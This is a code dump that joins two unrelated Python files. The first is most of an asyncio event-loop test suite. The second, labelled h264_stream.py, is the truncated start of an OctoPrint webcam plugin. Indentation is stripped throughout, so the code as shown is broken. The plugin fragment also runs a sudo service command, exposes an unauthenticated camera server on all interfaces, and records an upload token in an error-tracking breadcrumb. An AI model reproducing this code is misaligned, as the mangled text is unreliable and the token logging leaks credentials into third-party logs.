transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.send_signal(signal.SIGHUP)
self.loop.run_until_complete(proto.completed)
self.assertEqual(-signal.SIGHUP, proto.returncode)
transp.close()
finally:
signal.signal(signal.SIGHUP, old_handler)
def test_subprocess_stderr(self):
prog = os.path.join(os.path.dirname(__file__), 'echo2.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
stdin.write(b'test')
self.loop.run_until_complete(proto.completed)
transp.close()
self.assertEqual(b'OUT:test', proto.data[1])
self.assertTrue(proto.data[2].startswith(b'ERR:test'), proto.data[2])
self.assertEqual(0, proto.returncode)
def test_subprocess_stderr_redirect_to_stdout(self):
prog = os.path.join(os.path.dirname(__file__), 'echo2.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog, stderr=subprocess.STDOUT)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
self.assertIsNotNone(transp.get_pipe_transport(1))
self.assertIsNone(transp.get_pipe_transport(2))
stdin.write(b'test')
self.loop.run_until_complete(proto.completed)
self.assertTrue(proto.data[1].startswith(b'OUT:testERR:test'),
proto.data[1])
self.assertEqual(b'', proto.data[2])
transp.close()
self.assertEqual(0, proto.returncode)
def test_subprocess_close_client_stream(self):
prog = os.path.join(os.path.dirname(__file__), 'echo3.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
stdout = transp.get_pipe_transport(1)
stdin.write(b'test')
self.loop.run_until_complete(proto.got_data[1].wait())
self.assertEqual(b'OUT:test', proto.data[1])
stdout.close()
self.loop.run_until_complete(proto.disconnects[1])
stdin.write(b'xxx')
self.loop.run_until_complete(proto.got_data[2].wait())
if sys.platform != 'win32':
self.assertEqual(b'ERR:BrokenPipeError', proto.data[2])
else:
# After closing the read-end of a pipe, writing to the
# write-end using os.write() fails with errno==EINVAL and
# GetLastError()==ERROR_INVALID_NAME on Windows!?! (Using
# WriteFile() we get ERROR_BROKEN_PIPE as expected.)
self.assertEqual(b'ERR:OSError', proto.data[2])
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
def test_subprocess_wait_no_same_group(self):
# start the new process in a new session
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None,
start_new_session=True)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
transp.close()
def test_subprocess_exec_invalid_args(self):
async def connect(**kwds):
await self.loop.subprocess_exec(
asyncio.SubprocessProtocol,
'pwd', **kwds)
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(universal_newlines=True))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(bufsize=4096))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(shell=True))
def test_subprocess_shell_invalid_args(self):
async def connect(cmd=None, **kwds):
if not cmd:
cmd = 'pwd'
await self.loop.subprocess_shell(
asyncio.SubprocessProtocol,
cmd, **kwds)
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(['ls', '-l']))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(universal_newlines=True))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(bufsize=4096))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(shell=False))
if sys.platform == 'win32':
class SelectEventLoopTests(EventLoopTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop()
class ProactorEventLoopTests(EventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.ProactorEventLoop()
def test_reader_callback(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
def test_reader_callback_cancel(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
def test_writer_callback(self):
raise unittest.SkipTest("IocpEventLoop does not have add_writer()")
def test_writer_callback_cancel(self):
raise unittest.SkipTest("IocpEventLoop does not have add_writer()")
def test_remove_fds_after_closing(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
else:
import selectors
class UnixEventLoopTestsMixin(EventLoopTestsMixin):
def setUp(self):
super().setUp()
watcher = asyncio.SafeChildWatcher()
watcher.attach_loop(self.loop)
asyncio.set_child_watcher(watcher)
def tearDown(self):
asyncio.set_child_watcher(None)
super().tearDown()
if hasattr(selectors, 'KqueueSelector'):
class KqueueEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(
selectors.KqueueSelector())
# kqueue doesn't support character devices (PTY) on Mac OS X older
# than 10.9 (Maverick)
@support.requires_mac_ver(10, 9)
# Issue #20667: KqueueEventLoopTests.test_read_pty_output()
# hangs on OpenBSD 5.5
@unittest.skipIf(sys.platform.startswith('openbsd'),
'test hangs on OpenBSD')
def test_read_pty_output(self):
super().test_read_pty_output()
# kqueue doesn't support character devices (PTY) on Mac OS X older
# than 10.9 (Maverick)
@support.requires_mac_ver(10, 9)
def test_write_pty(self):
super().test_write_pty()
if hasattr(selectors, 'EpollSelector'):
class EPollEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.EpollSelector())
if hasattr(selectors, 'PollSelector'):
class PollEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.PollSelector())
# Should always exist.
class SelectEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.SelectSelector())
def noop(*args, **kwargs):
pass
class HandleTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = mock.Mock()
self.loop.get_debug.return_value = True
def test_handle(self):
def callback(*args):
return args
args = ()
h = asyncio.Handle(callback, args, self.loop)
self.assertIs(h._callback, callback)
self.assertIs(h._args, args)
self.assertFalse(h.cancelled())
h.cancel()
self.assertTrue(h.cancelled())
def test_callback_with_exception(self):
def callback():
raise ValueError()
self.loop = mock.Mock()
self.loop.call_exception_handler = mock.Mock()
h = asyncio.Handle(callback, (), self.loop)
h._run()
self.loop.call_exception_handler.assert_called_with({
'message': test_utils.MockPattern('Exception in callback.*'),
'exception': mock.ANY,
'handle': h,
'source_traceback': h._source_traceback,
})
def test_handle_weakref(self):
wd = weakref.WeakValueDictionary()
h = asyncio.Handle(lambda: None, (), self.loop)
wd['h'] = h # Would fail without __weakref__ slot.
def test_handle_repr(self):
self.loop.get_debug.return_value = False
# simple function
h = asyncio.Handle(noop, (1, 2), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<Handle noop(1, 2) at %s:%s>'
% (filename, lineno))
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<Handle cancelled>')
# decorated function
cb = types.coroutine(noop)
h = asyncio.Handle(cb, (), self.loop)
self.assertEqual(repr(h),
'<Handle noop() at %s:%s>'
% (filename, lineno))
# partial function
cb = functools.partial(noop, 1, 2)
h = asyncio.Handle(cb, (3,), self.loop)
regex = (r'^<Handle noop\(1, 2\)\(3\) at %s:%s>$'
% (re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
# partial function with keyword args
cb = functools.partial(noop, x=1)
h = asyncio.Handle(cb, (2, 3), self.loop)
regex = (r'^<Handle noop\(x=1\)\(2, 3\) at %s:%s>$'
% (re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
# partial method
method = HandleTests.test_handle_repr
cb = functools.partialmethod(method)
filename, lineno = test_utils.get_function_source(method)
h = asyncio.Handle(cb, (), self.loop)
cb_regex = r'<function HandleTests.test_handle_repr .*>'
cb_regex = fr'functools.partialmethod\({cb_regex}, , \)\(\)'
regex = fr'^<Handle {cb_regex} at {re.escape(filename)}:{lineno}>$'
self.assertRegex(repr(h), regex)
def test_handle_repr_debug(self):
self.loop.get_debug.return_value = True
# simple function
create_filename = __file__
create_lineno = sys._getframe().f_lineno + 1
h = asyncio.Handle(noop, (1, 2), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<Handle noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# cancelled handle
h.cancel()
self.assertEqual(
repr(h),
'<Handle cancelled noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# double cancellation won't overwrite _repr
h.cancel()
self.assertEqual(
repr(h),
'<Handle cancelled noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
def test_handle_source_traceback(self):
loop = asyncio.get_event_loop_policy().new_event_loop()
loop.set_debug(True)
self.set_event_loop(loop)
def check_source_traceback(h):
lineno = sys._getframe(1).f_lineno - 1
self.assertIsInstance(h._source_traceback, list)
self.assertEqual(h._source_traceback[-1][:3],
(__file__,
lineno,
'test_handle_source_traceback'))
# call_soon
h = loop.call_soon(noop)
check_source_traceback(h)
# call_soon_threadsafe
h = loop.call_soon_threadsafe(noop)
check_source_traceback(h)
# call_later
h = loop.call_later(0, noop)
check_source_traceback(h)
# call_at
h = loop.call_later(0, noop)
check_source_traceback(h)
@unittest.skipUnless(hasattr(collections.abc, 'Coroutine'),
'No collections.abc.Coroutine')
def test_coroutine_like_object_debug_formatting(self):
# Test that asyncio can format coroutines that are instances of
# collections.abc.Coroutine, but lack cr_core or gi_code attributes
# (such as ones compiled with Cython).
coro = CoroLike()
coro.__name__ = 'AAA'
self.assertTrue(asyncio.iscoroutine(coro))
self.assertEqual(coroutines._format_coroutine(coro), 'AAA()')
coro.__qualname__ = 'BBB'
self.assertEqual(coroutines._format_coroutine(coro), 'BBB()')
coro.cr_running = True
self.assertEqual(coroutines._format_coroutine(coro), 'BBB() running')
coro.__name__ = coro.__qualname__ = None
self.assertEqual(coroutines._format_coroutine(coro),
'<CoroLike without __name__>() running')
coro = CoroLike()
coro.__qualname__ = 'CoroLike'
# Some coroutines might not have '__name__', such as
# built-in async_gen.asend().
self.assertEqual(coroutines._format_coroutine(coro), 'CoroLike()')
coro = CoroLike()
coro.__qualname__ = 'AAA'
coro.cr_code = None
self.assertEqual(coroutines._format_coroutine(coro), 'AAA()')
class TimerTests(unittest.TestCase):
def setUp(self):
super().setUp()
self.loop = mock.Mock()
def test_hash(self):
when = time.monotonic()
h = asyncio.TimerHandle(when, lambda: False, (),
mock.Mock())
self.assertEqual(hash(h), hash(when))
def test_when(self):
when = time.monotonic()
h = asyncio.TimerHandle(when, lambda: False, (),
mock.Mock())
self.assertEqual(when, h.when())
def test_timer(self):
def callback(*args):
return args
args = (1, 2, 3)
when = time.monotonic()
h = asyncio.TimerHandle(when, callback, args, mock.Mock())
self.assertIs(h._callback, callback)
self.assertIs(h._args, args)
self.assertFalse(h.cancelled())
# cancel
h.cancel()
self.assertTrue(h.cancelled())
self.assertIsNone(h._callback)
self.assertIsNone(h._args)
def test_timer_repr(self):
self.loop.get_debug.return_value = False
# simple function
h = asyncio.TimerHandle(123, noop, (), self.loop)
src = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<TimerHandle when=123 noop() at %s:%s>' % src)
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<TimerHandle cancelled when=123>')
def test_timer_repr_debug(self):
self.loop.get_debug.return_value = True
# simple function
create_filename = __file__
create_lineno = sys._getframe().f_lineno + 1
h = asyncio.TimerHandle(123, noop, (), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<TimerHandle when=123 noop() '
'at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<TimerHandle cancelled when=123 noop() '
'at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
def test_timer_comparison(self):
def callback(*args):
return args
when = time.monotonic()
h1 = asyncio.TimerHandle(when, callback, (), self.loop)
h2 = asyncio.TimerHandle(when, callback, (), self.loop)
# TODO: Use assertLess etc.
self.assertFalse(h1 < h2)
self.assertFalse(h2 < h1)
self.assertTrue(h1 <= h2)
self.assertTrue(h2 <= h1)
self.assertFalse(h1 > h2)
self.assertFalse(h2 > h1)
self.assertTrue(h1 >= h2)
self.assertTrue(h2 >= h1)
self.assertTrue(h1 == h2)
self.assertFalse(h1 != h2)
h2.cancel()
self.assertFalse(h1 == h2)
h1 = asyncio.TimerHandle(when, callback, (), self.loop)
h2 = asyncio.TimerHandle(when + 10.0, callback, (), self.loop)
self.assertTrue(h1 < h2)
self.assertFalse(h2 < h1)
self.assertTrue(h1 <= h2)
self.assertFalse(h2 <= h1)
self.assertFalse(h1 > h2)
self.assertTrue(h2 > h1)
self.assertFalse(h1 >= h2)
self.assertTrue(h2 >= h1)
self.assertFalse(h1 == h2)
self.assertTrue(h1 != h2)
h3 = asyncio.Handle(callback, (), self.loop)
self.assertIs(NotImplemented, h1.__eq__(h3))
self.assertIs(NotImplemented, h1.__ne__(h3))
with self.assertRaises(TypeError):
h1 < ()
with self.assertRaises(TypeError):
h1 > ()
with self.assertRaises(TypeError):
h1 <= ()
with self.assertRaises(TypeError):
h1 >= ()
self.assertFalse(h1 == ())
self.assertTrue(h1 != ())
self.assertTrue(h1 == ALWAYS_EQ)
self.assertFalse(h1 != ALWAYS_EQ)
self.assertTrue(h1 < LARGEST)
self.assertFalse(h1 > LARGEST)
self.assertTrue(h1 <= LARGEST)
self.assertFalse(h1 >= LARGEST)
self.assertFalse(h1 < SMALLEST)
self.assertTrue(h1 > SMALLEST)
self.assertFalse(h1 <= SMALLEST)
self.assertTrue(h1 >= SMALLEST)
class AbstractEventLoopTests(unittest.TestCase):
def test_not_implemented(self):
f = mock.Mock()
loop = asyncio.AbstractEventLoop()
self.assertRaises(
NotImplementedError, loop.run_forever)
self.assertRaises(
NotImplementedError, loop.run_until_complete, None)
self.assertRaises(
NotImplementedError, loop.stop)
self.assertRaises(
NotImplementedError, loop.is_running)
self.assertRaises(
NotImplementedError, loop.is_closed)
self.assertRaises(
NotImplementedError, loop.close)
self.assertRaises(
NotImplementedError, loop.create_task, None)
self.assertRaises(
NotImplementedError, loop.call_later, None, None)
self.assertRaises(
NotImplementedError, loop.call_at, f, f)
self.assertRaises(
NotImplementedError, loop.call_soon, None)
self.assertRaises(
NotImplementedError, loop.time)
self.assertRaises(
NotImplementedError, loop.call_soon_threadsafe, None)
self.assertRaises(
NotImplementedError, loop.set_default_executor, f)
self.assertRaises(
NotImplementedError, loop.add_reader, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_reader, 1)
self.assertRaises(
NotImplementedError, loop.add_writer, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_writer, 1)
self.assertRaises(
NotImplementedError, loop.add_signal_handler, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_signal_handler, 1)
self.assertRaises(
NotImplementedError, loop.remove_signal_handler, 1)
self.assertRaises(
NotImplementedError, loop.set_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.default_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.call_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.get_debug)
self.assertRaises(
NotImplementedError, loop.set_debug, f)
def test_not_implemented_async(self):
async def inner():
f = mock.Mock()
loop = asyncio.AbstractEventLoop()
with self.assertRaises(NotImplementedError):
await loop.run_in_executor(f, f)
with self.assertRaises(NotImplementedError):
await loop.getaddrinfo('localhost', 8080)
with self.assertRaises(NotImplementedError):
await loop.getnameinfo(('localhost', 8080))
with self.assertRaises(NotImplementedError):
await loop.create_connection(f)
with self.assertRaises(NotImplementedError):
await loop.create_server(f)
with self.assertRaises(NotImplementedError):
await loop.create_datagram_endpoint(f)
with self.assertRaises(NotImplementedError):
await loop.sock_recv(f, 10)
with self.assertRaises(NotImplementedError):
await loop.sock_recv_into(f, 10)
with self.assertRaises(NotImplementedError):
await loop.sock_sendall(f, 10)
with self.assertRaises(NotImplementedError):
await loop.sock_connect(f, f)
with self.assertRaises(NotImplementedError):
await loop.sock_accept(f)
with self.assertRaises(NotImplementedError):
await loop.sock_sendfile(f, f)
with self.assertRaises(NotImplementedError):
await loop.sendfile(f, f)
with self.assertRaises(NotImplementedError):
await loop.connect_read_pipe(f, mock.sentinel.pipe)
with self.assertRaises(NotImplementedError):
await loop.connect_write_pipe(f, mock.sentinel.pipe)
with self.assertRaises(NotImplementedError):
await loop.subprocess_shell(f, mock.sentinel)
with self.assertRaises(NotImplementedError):
await loop.subprocess_exec(f)
loop = asyncio.new_event_loop()
loop.run_until_complete(inner())
loop.close()
class PolicyTests(unittest.TestCase):
def test_event_loop_policy(self):
policy = asyncio.AbstractEventLoopPolicy()
self.assertRaises(NotImplementedError, policy.get_event_loop)
self.assertRaises(NotImplementedError, policy.set_event_loop, object())
self.assertRaises(NotImplementedError, policy.new_event_loop)
self.assertRaises(NotImplementedError, policy.get_child_watcher)
self.assertRaises(NotImplementedError, policy.set_child_watcher,
object())
def test_get_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
self.assertIsNone(policy._local._loop)
loop = policy.get_event_loop()
self.assertIsInstance(loop, asyncio.AbstractEventLoop)
self.assertIs(policy._local._loop, loop)
self.assertIs(loop, policy.get_event_loop())
loop.close()
def test_get_event_loop_calls_set_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
with mock.patch.object(
policy, "set_event_loop",
wraps=policy.set_event_loop) as m_set_event_loop:
loop = policy.get_event_loop()
# policy._local._loop must be set through .set_event_loop()
# (the unix DefaultEventLoopPolicy needs this call to attach
# the child watcher correctly)
m_set_event_loop.assert_called_with(loop)
loop.close()
def test_get_event_loop_after_set_none(self):
policy = asyncio.DefaultEventLoopPolicy()
policy.set_event_loop(None)
self.assertRaises(RuntimeError, policy.get_event_loop)
@mock.patch('asyncio.events.threading.current_thread')
def test_get_event_loop_thread(self, m_current_thread):
def f():
policy = asyncio.DefaultEventLoopPolicy()
self.assertRaises(RuntimeError, policy.get_event_loop)
th = threading.Thread(target=f)
th.start()
th.join()
def test_new_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
loop = policy.new_event_loop()
self.assertIsInstance(loop, asyncio.AbstractEventLoop)
loop.close()
def test_set_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
old_loop = policy.get_event_loop()
self.assertRaises(TypeError, policy.set_event_loop, object())
loop = policy.new_event_loop()
policy.set_event_loop(loop)
self.assertIs(loop, policy.get_event_loop())
self.assertIsNot(old_loop, policy.get_event_loop())
loop.close()
old_loop.close()
def test_get_event_loop_policy(self):
policy = asyncio.get_event_loop_policy()
self.assertIsInstance(policy, asyncio.AbstractEventLoopPolicy)
self.assertIs(policy, asyncio.get_event_loop_policy())
def test_set_event_loop_policy(self):
self.assertRaises(
TypeError, asyncio.set_event_loop_policy, object())
old_policy = asyncio.get_event_loop_policy()
policy = asyncio.DefaultEventLoopPolicy()
asyncio.set_event_loop_policy(policy)
self.assertIs(policy, asyncio.get_event_loop_policy())
self.assertIsNot(policy, old_policy)
class GetEventLoopTestsMixin:
_get_running_loop_impl = None
_set_running_loop_impl = None
get_running_loop_impl = None
get_event_loop_impl = None
def setUp(self):
self._get_running_loop_saved = events._get_running_loop
self._set_running_loop_saved = events._set_running_loop
self.get_running_loop_saved = events.get_running_loop
self.get_event_loop_saved = events.get_event_loop
events._get_running_loop = type(self)._get_running_loop_impl
events._set_running_loop = type(self)._set_running_loop_impl
events.get_running_loop = type(self).get_running_loop_impl
events.get_event_loop = type(self).get_event_loop_impl
asyncio._get_running_loop = type(self)._get_running_loop_impl
asyncio._set_running_loop = type(self)._set_running_loop_impl
asyncio.get_running_loop = type(self).get_running_loop_impl
asyncio.get_event_loop = type(self).get_event_loop_impl
super().setUp()
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
if sys.platform != 'win32':
watcher = asyncio.SafeChildWatcher()
watcher.attach_loop(self.loop)
asyncio.set_child_watcher(watcher)
def tearDown(self):
try:
if sys.platform != 'win32':
asyncio.set_child_watcher(None)
super().tearDown()
finally:
self.loop.close()
asyncio.set_event_loop(None)
events._get_running_loop = self._get_running_loop_saved
events._set_running_loop = self._set_running_loop_saved
events.get_running_loop = self.get_running_loop_saved
events.get_event_loop = self.get_event_loop_saved
asyncio._get_running_loop = self._get_running_loop_saved
asyncio._set_running_loop = self._set_running_loop_saved
asyncio.get_running_loop = self.get_running_loop_saved
asyncio.get_event_loop = self.get_event_loop_saved
if sys.platform != 'win32':
def test_get_event_loop_new_process(self):
# bpo-32126: The multiprocessing module used by
# ProcessPoolExecutor is not functional when the
# multiprocessing.synchronize module cannot be imported.
support.skip_if_broken_multiprocessing_synchronize()
async def main():
pool = concurrent.futures.ProcessPoolExecutor()
result = await self.loop.run_in_executor(
pool, _test_get_event_loop_new_process__sub_proc)
pool.shutdown()
return result
self.assertEqual(
self.loop.run_until_complete(main()),
'hello')
def test_get_event_loop_returns_running_loop(self):
class TestError(Exception):
pass
class Policy(asyncio.DefaultEventLoopPolicy):
def get_event_loop(self):
raise TestError
old_policy = asyncio.get_event_loop_policy()
try:
asyncio.set_event_loop_policy(Policy())
loop = asyncio.new_event_loop()
with self.assertWarns(DeprecationWarning) as cm:
with self.assertRaises(TestError):
asyncio.get_event_loop()
self.assertEqual(cm.warnings[0].filename, __file__)
asyncio.set_event_loop(None)
with self.assertWarns(DeprecationWarning) as cm:
with self.assertRaises(TestError):
asyncio.get_event_loop()
self.assertEqual(cm.warnings[0].filename, __file__)
with self.assertRaisesRegex(RuntimeError, 'no running'):
asyncio.get_running_loop()
self.assertIs(asyncio._get_running_loop(), None)
async def func():
self.assertIs(asyncio.get_event_loop(), loop)
self.assertIs(asyncio.get_running_loop(), loop)
self.assertIs(asyncio._get_running_loop(), loop)
loop.run_until_complete(func())
asyncio.set_event_loop(loop)
with self.assertWarns(DeprecationWarning) as cm:
with self.assertRaises(TestError):
asyncio.get_event_loop()
self.assertEqual(cm.warnings[0].filename, __file__)
asyncio.set_event_loop(None)
with self.assertWarns(DeprecationWarning) as cm:
with self.assertRaises(TestError):
asyncio.get_event_loop()
self.assertEqual(cm.warnings[0].filename, __file__)
finally:
asyncio.set_event_loop_policy(old_policy)
if loop is not None:
loop.close()
with self.assertRaisesRegex(RuntimeError, 'no running'):
asyncio.get_running_loop()
self.assertIs(asyncio._get_running_loop(), None)
def test_get_event_loop_returns_running_loop2(self):
old_policy = asyncio.get_event_loop_policy()
try:
asyncio.set_event_loop_policy(asyncio.DefaultEventLoopPolicy())
loop = asyncio.new_event_loop()
self.addCleanup(loop.close)
with self.assertWarns(DeprecationWarning) as cm:
loop2 = asyncio.get_event_loop()
self.addCleanup(loop2.close)
self.assertEqual(cm.warnings[0].filename, __file__)
asyncio.set_event_loop(None)
with self.assertWarns(DeprecationWarning) as cm:
with self.assertRaisesRegex(RuntimeError, 'no current'):
asyncio.get_event_loop()
self.assertEqual(cm.warnings[0].filename, __file__)
with self.assertRaisesRegex(RuntimeError, 'no running'):
asyncio.get_running_loop()
self.assertIs(asyncio._get_running_loop(), None)
async def func():
self.assertIs(asyncio.get_event_loop(), loop)
self.assertIs(asyncio.get_running_loop(), loop)
self.assertIs(asyncio._get_running_loop(), loop)
loop.run_until_complete(func())
asyncio.set_event_loop(loop)
with self.assertWarns(DeprecationWarning) as cm:
self.assertIs(asyncio.get_event_loop(), loop)
self.assertEqual(cm.warnings[0].filename, __file__)
asyncio.set_event_loop(None)
with self.assertWarns(DeprecationWarning) as cm:
with self.assertRaisesRegex(RuntimeError, 'no current'):
asyncio.get_event_loop()
self.assertEqual(cm.warnings[0].filename, __file__)
finally:
asyncio.set_event_loop_policy(old_policy)
if loop is not None:
loop.close()
with self.assertRaisesRegex(RuntimeError, 'no running'):
asyncio.get_running_loop()
self.assertIs(asyncio._get_running_loop(), None)
class TestPyGetEventLoop(GetEventLoopTestsMixin, unittest.TestCase):
_get_running_loop_impl = events._py__get_running_loop
_set_running_loop_impl = events._py__set_running_loop
get_running_loop_impl = events._py_get_running_loop
get_event_loop_impl = events._py_get_event_loop
try:
import _asyncio # NoQA
except ImportError:
pass
else:
class TestCGetEventLoop(GetEventLoopTestsMixin, unittest.TestCase):
_get_running_loop_impl = events._c__get_running_loop
_set_running_loop_impl = events._c__set_running_loop
get_running_loop_impl = events._c_get_running_loop
get_event_loop_impl = events._c_get_event_loop
class TestServer(unittest.TestCase):
def test_get_loop(self):
loop = asyncio.new_event_loop()
self.addCleanup(loop.close)
proto = MyProto(loop)
server = loop.run_until_complete(loop.create_server(lambda: proto, '0.0.0.0', 0))
self.assertEqual(server.get_loop(), loop)
server.close()
loop.run_until_complete(server.wait_closed())
class TestAbstractServer(unittest.TestCase):
def test_close(self):
with self.assertRaises(NotImplementedError):
events.AbstractServer().close()
def test_wait_closed(self):
loop = asyncio.new_event_loop()
self.addCleanup(loop.close)
with self.assertRaises(NotImplementedError):
loop.run_until_complete(events.AbstractServer().wait_closed())
def test_get_loop(self):
with self.assertRaises(NotImplementedError):
events.AbstractServer().get_loop()
if __name__ == '__main__':
unittest.main()
|
h264_stream.py | import io
import os
import logging
import subprocess
import time
import sarge
import sys
import flask
from collections import deque
try:
import queue
except ImportError:
import Queue as queue
from threading import Thread, RLock
import requests
import yaml
from raven import breadcrumbs
import tempfile
from .utils import pi_version
_logger = logging.getLogger('octoprint.plugins.anywhere')
FFMPEG = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'bin', 'ffmpeg')
CAM_EXCLUSIVE_USE = os.path.join(tempfile.gettempdir(), '.using_picam')
TS_TEMP_DIR = os.path.join(tempfile.gettempdir(), 'octoprintanywhere-ts')
if not os.path.exists(TS_TEMP_DIR):
os.mkdir(TS_TEMP_DIR)
class WebcamServer:
def __init__(self, camera):
self.camera = camera
self.img_q = queue.Queue(maxsize=1)
self.last_capture = 0
self._mutex = RLock()
def capture_forever(self):
bio = io.BytesIO()
for foo in self.camera.capture_continuous(bio, format='jpeg', use_video_port=True):
bio.seek(0)
chunk = bio.read()
bio.seek(0)
bio.truncate()
with self._mutex:
last_last_capture = self.last_capture
self.last_capture = time.time()
self.img_q.put(chunk)
def mjpeg_generator(self, boundary):
try:
hdr = '--%s\r\nContent-Type: image/jpeg\r\n' % boundary
prefix = ''
while True:
chunk = self.img_q.get()
msg = prefix + hdr + 'Content-Length: {}\r\n\r\n'.format(len(chunk))
yield msg.encode('iso-8859-1') + chunk
prefix = '\r\n'
time.sleep(0.15) # slow down mjpeg streaming so that it won't use too much cpu or bandwidth
except GeneratorExit:
print('closed')
def get_snapshot(self):
possible_stale_pics = 3
while True:
chunk = self.img_q.get()
with self._mutex:
gap = time.time() - self.last_capture
if gap < 0.1:
possible_stale_pics -= 1 # Get a few pics to make sure we are not returning a stale pic, which will throw off Octolapse
if possible_stale_pics <= 0:
break
return flask.send_file(io.BytesIO(chunk), mimetype='image/jpeg')
def get_mjpeg(self):
boundary='herebedragons'
return flask.Response(flask.stream_with_context(self.mjpeg_generator(boundary)), mimetype='multipart/x-mixed-replace;boundary=%s' % boundary)
def run_forever(self):
webcam_server_app = flask.Flask('webcam_server')
@webcam_server_app.route('/')
def webcam():
action = flask.request.args['action']
if action == 'snapshot':
return self.get_snapshot()
else:
return self.get_mjpeg()
webcam_server_app.run(host='0.0.0.0', port=8080, threaded=True)
def start(self):
cam_server_thread = Thread(target=self.run_forever)
cam_server_thread.daemon = True
cam_server_thread.start()
capture_thread = Thread(target=self.capture_forever)
capture_thread.daemon = True
capture_thread.start()
class H264Streamer:
def __init__(self, stream_host, token, sentryClient):
self.m3u8_q = deque([], 24)
self.stream_host = stream_host
self.token = token
self.sentryClient = sentryClient
def __init_camera__(self, plugin, dev_settings):
def resolution_tuple(dev_settings):
res_map = {
"low": (320,240),
"medium": (640, 480),
"high": (1296, 972),
"high_16_9": (1280, 720),
"ultrahigh_16_9": (1920, 1080),
}
resolution = res_map[dev_settings.get('camResolution', 'medium')]
return reversed(resolution) if dev_settings.get('rotate90', False) ^ dev_settings.get('rotate90N', False) else resolution # need to swap width and height if rotated
if not pi_version():
self.camera = StubCamera()
global FFMPEG
FFMPEG = 'ffmpeg'
else:
sarge.run('sudo service webcamd stop')
try:
import picamera
self.camera = picamera.PiCamera()
self.camera.framerate=25
self.camera.resolution=resolution_tuple(dev_settings)
self.camera.hflip=dev_settings.get('flipH', False)
self.camera.vflip=dev_settings.get('flipV', False)
rotation = (90 if dev_settings.get('rotate90', False) else 0)
rotation += (-90 if dev_settings.get('rotate90N', False) else 0)
self.camera.rotation=rotation
except:
sarge.run('sudo service webcamd start') # failed to start picamera. falling back to mjpeg-streamer
plugin.config.set_picamera_error(True)
self.sentryClient.captureException()
exc_type, exc_obj, exc_tb = sys.exc_info()
_logger.error(exc_obj, exc_info=True)
return False
return True
def start_hls_pipeline(self, remote_status, plugin, dev_settings):
breadcrumbs.record(message="Token to upload mpegts: " + self.token)
